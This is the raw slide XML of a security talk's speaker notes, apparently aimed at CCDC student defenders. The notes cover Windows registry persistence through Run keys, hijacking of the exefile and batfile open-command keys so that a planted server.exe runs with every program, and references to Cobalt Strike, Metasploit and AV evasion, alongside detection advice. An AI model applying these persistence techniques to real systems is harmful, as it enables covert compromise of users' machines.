              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> add(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) HKLM\SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Run </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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 with Security Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in Azure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https://azure.microsoft.com/en-us/blog/detecting-fileless-attacks-with-azure-security-center/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Windows Defender Advanced Threat Protection (ATP) is a unified platform for preventative protection, post-breach detection, automated investigation,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https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats#type-ii-indirect-file-activity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Security Center Playbook: Hunting Threats.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https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1933386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mission of the Collegiate Cyber Defense Competition (CCDC) system is to provide institutions with an information assurance or computer security curriculum a controlled, competitive environment to assess their student's depth of understanding and operational competency in managing the challenges inherent in protecting a corporate network infrastructure and business information systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CCDC Events are designed to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build a meaningful mechanism by which institutions of higher education may evaluate their programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide an educational venue in which students are able to apply the theory and practical skills they have learned in their course work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foster a spirit of teamwork, ethical behavior, and effective communication both within and across teams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create interest and awareness among participating institutions and students</a:t>
            </a:r>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="807651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monitor Registry and Installed Patches because adversaries are looking and leaving signs of activities. https://www.ultimatewindowssecurity.com/webinars/register.aspx?id=1514</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>autoruns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for startup programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Hash of known files that might be backdoored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> with extra malicious program. Think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>BackdoorFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Or I can use CS and automate a lot of techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>These reg keys will basically spawn your programs, as you can see this is very dangerous because these keys are very used by viruses and Trojans. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>exefile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[HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>comfile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[HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>batfile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[HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>htafile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[HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>piffile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[HKEY_LOCAL_MACHINE\Software\CLASSES\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>batfile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[HKEY_LOCAL_MACHINE\Software\CLASSES\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>comfile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[HKEY_LOCAL_MACHINE\Software\CLASSES\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>exefile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[HKEY_LOCAL_MACHINE\Software\CLASSES\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>htafile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[HKEY_LOCAL_MACHINE\Software\CLASSES\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>piffile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>\shell\open\command] @="\"%1\" %*"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key should have a value of Value "%1 %*", if this is changed to "server.exe %1 %*", the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>server.exe will be executed EVERYTIME an exe/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>pif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/com/bat/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is executed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90017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CS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you learn nothing else from me other than to check the manual and Blogs post by Raphael my time here is worth it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/aggressor-script/index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://github.com/bluscreenofjeff/AggressorScripts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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3649431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CS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you learn nothing else from me other than to check the manual and Blogs post by Raphael my time here is worth it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/aggressor-script/index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://github.com/bluscreenofjeff/AggressorScripts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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2635206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CS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you learn nothing else from me other than to check the manual and Blogs post by Raphael my time here is worth it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/aggressor-script/index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://github.com/bluscreenofjeff/AggressorScripts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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2380402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https://www.metasploit.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.powershellempire.com/</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138453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CS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you learn nothing else from me other than to check the manual and Blogs post by Raphael my time here is worth it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/aggressor-script/index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://github.com/bluscreenofjeff/AggressorScripts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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2852533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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Chain for automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>SMB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://blog.rapid7.com/2017/10/31/testing-smb-server-security-with-metasploit-pro-task-chains-part-1/</a:t>
            </a:r>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1047574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Maloney will demonstrate a new AV evasion technique in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pro that evades detection in more than 90% of cases and has the ability to evade all ten leading anti-virus solutions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://information.rapid7.com/dynamic-payloads-for-av-evasion.html</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Rapid7 YouTube: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?reload=9&amp;v=1LZCb4HJlkI</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65377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https://www.cisecurity.org/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https://www.microsoft.com/en-us/msrc/technical-security-notifications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https://www.us-cert.gov/mailing-lists-and-feeds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https://www.malwarearchaeology.com/cheat-sheets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Free Tools to Review/Monitor/Log: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, Audit logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> line auditing, PowerShell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https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/RP_Patch_Management_S508C.pdf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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4215745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This technique utilises Internet and in memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> exécution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>\\https://live.sysinternals.com/ logonsessions.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OK enough CCDC stuff back to “What even looks bad? (Adversary Tactics)”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396702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Vincent is up to around 220 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RedTips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpectorOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MattGraeber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Andy Robins (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), Enigma, </a:t>
